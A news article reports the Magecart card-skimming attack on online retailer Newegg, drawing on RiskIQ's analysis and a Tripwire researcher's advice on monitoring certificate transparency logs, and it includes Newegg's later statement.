The infamous Magecart code has struck again, with an attack group this time using it to skim card details from customers of online retailer Newegg for a full month, according to researchers.
The US-based, tech-focused e-tailer has yet to release a statement on the news, but RiskIQ, which has been following Magecart closely over the past couple of years, posted an analysis of the attack yesterday.
Threat researcher Yonathan Klijnsma explained that, just like in the recently disclosed BA breach, the attackers made a concerted effort to blend in to the background to avoid detection.
They did this by first registering a domain similar to the primary newegg.com domain, certifying it with a Comodo certificate for authenticity. The linked IP address hosted a back-end server where skimmed card info was apparently stored.
The attackers then struck on around August 14, inserting the Magecart code on the retailer’s payment processing page, where it remained hidden for a month.
“The skimmer code is recognizable from the British Airways incident, with the same basecode. All the attackers changed is the name of the form it needs to serialize to obtain payment information and the server to send it to, this time themed with Newegg instead of British Airways, explained Klijnsma.
“In the case of Newegg, the skimmer was smaller because it only had to serialize one form and therefore condensed down to a tidy 15 lines of script.”
The code worked on both mobile and desktop versions of the site, and with estimated visitors to Newegg regularly numbering over 50 million per month, this could point to another significant breach of card data, according to RiskIQ.
“The attack on Newegg shows that while third parties have been a problem for websites — as in the case of the Ticketmaster breach — self-hosted scripts help attackers move and evolve, in this case changing the actual payment processing pages to place their skimmer,” concluded Klijnsma.
“We urge banks to issue new cards or added protection through OTP on cards they can correlate belonging to transactions that occurred on Newegg between August 14 and September 18.”
Newegg claims it is still determining which customer accounts have been affected.
Craig Young, security researcher at Tripwire, argued that organizations should be monitoring certificate transparency logs more closely to spot the early warning signs of an attack.
“In this case, the attack campaign started with the attackers setting up an HTTPS server at neweggstats.com,” he explained. “For Newegg, seeing this domain come online wouldn’t immediately indicate a breach, but it should be enough for a security team to investigate further and likely reveal the newly added references to this domain in their checkout code.”
UPDATE
Newegg later posted a tweet to its timeline, saying it had learned that one of its servers had been injected with malware which was identified and removed from our site. "We’re conducting extensive research to determine exactly what info was obtained and are sending emails to customers potentially impacted."